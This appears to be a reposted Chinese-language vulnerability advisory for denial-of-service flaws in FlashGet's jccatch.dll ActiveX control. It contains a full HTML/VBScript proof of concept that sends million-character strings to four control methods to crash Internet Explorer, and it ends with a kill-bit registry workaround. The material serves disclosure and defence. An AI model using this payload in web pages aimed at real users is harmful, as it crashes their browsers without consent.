FlashGet jccatch.dll ActiveX控件多个拒绝服务漏洞

来源：互联网发布：小米手机网络短信编辑：程序博客网时间：2024/05/22 17:00

Submitted by 7jdg on 2007, October 20, 3:00 PM. 溢出

受影响的系统
FlashGet 1.9.6.1073

描述：

FlashGet　－全球最多人使用的下载工具。可支持多种资源格式。
IE浏览器在以畸形参数调用FlashGet的jccatch.dll ActiveX控件时存在漏洞，恶意网站可能利用此漏洞导致用户浏览器崩溃。
如果用户受骗打开了恶意的WEB页面的话，就会触发这个漏洞，导致浏览器崩溃。

测试方法

XML/HTML代码

-----------------------------------------------------------------------------<br>
FlashGet jccatch.dll multiple methods Denial of Service<br>
site: http://1v1.name<br>
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6<br>
-----------------------------------------------------------------------------<br>
<object classid='clsid:FB5DA724-162B-11D3-8B9B-AA70B4B0B524' id='FlashGet'></object>
<select name="Pucca">
<option value = "AddUrl">AddUrl</option>
<option value = "AddFgUrl">AddFgUrl</option>
<option value = "IsUrlExist">IsUrlExist</option>
<option value = "Initialize">Initialize</option>
</select>
<input language=VBScript onclick=tryMe() type=button value="测试">
<script language='vbscript'>
Sub tryMe
on error resume next
if Pucca.value="AddUrl" then
argCount = 3
arg1="defaultV"
arg2="defaultV"
arg3=String(1000000, "A")
FlashGet.AddUrl arg1 ,arg2 ,arg3
elseif Pucca.value="AddFgUrl" then
argCount = 3
arg1="defaultV"
arg2="defaultV"
arg3=String(1000000, "A")
FlashGet.AddFgUrl arg1 ,arg2 ,arg3
elseif Pucca.value="IsUrlExist" then
argCount = 1
arg1=String(1000000, "A")
FlashGet.IsUrlExist arg1
elseif Pucca.value = "Initialize" then
argCount = 2
arg1="defaultV"
arg2=String(1000000, "A")
FlashGet.Initialize arg1 ,arg2
end if
End Sub
</script>

临时解决方法：

在IE中禁用 FlashGet jccatch.dll　ActiveX控件，为以下CLSID设置kill bit：
{FB5DA724-162B-11D3-8B9B-AA70B4B0B524}

或将以下文本保存为.REG文件并导入：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{FB5DA724-162B-11D3-8B9B-AA70B4B0B524}]
"Compatibility Flags"=dword:00000400